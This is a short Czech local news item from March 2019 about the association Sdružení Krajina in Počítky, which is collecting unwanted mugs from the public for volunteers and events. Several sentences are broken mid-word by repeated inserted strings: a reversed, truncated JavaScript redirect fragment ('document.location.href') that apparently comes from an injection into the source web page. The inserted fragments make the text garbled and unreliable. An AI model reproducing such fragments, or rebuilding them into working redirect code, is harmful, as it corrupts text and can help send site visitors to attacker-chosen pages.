Rainbow page separator

Sdružení Krajina shání nepotřebné hrníčky na veřejné akce

Úterý, 12. března 2019

Počítky / Nedostatek hrníčků na akcích pro veřejnost zaznamenali zaměstnanci Sdružení Krajina. Obracejí se pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na veřejnost, pokud ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to disponuje již nepotřebnými hrnečky, které by jim byla ochotna věnovat.
„Máte doma nějaké nevyužité hrnečky po babičce nebo přeplněné kredence a je vám lí[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to je jen tak vyhodit? Můžeme vám zaručit, že u nás si svoje mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to a využití opět najdou. Sezona tu bude coby dup, a my jsme zjistili, že po minulém roce máme nedostatek hrnků pro dobrovolníky a na veřejné akce. Koncem minulého roku jsme [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž měli menší „nehodu“ a při přepravě se nám velká část hrníčků rozbila,“ přiblížila Dagmar Papáčková ze Sdružení Krajina.
Zájemci mohou své přebytečné hrnky přinést či přivézt přímo do sídla Sdružení Krajina v Počítkách číslo popisné 2 a dát si tam při té příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti kávu, anebo si je tamní zaměstnanci po domluvě vyzvednou sami na udaném místě.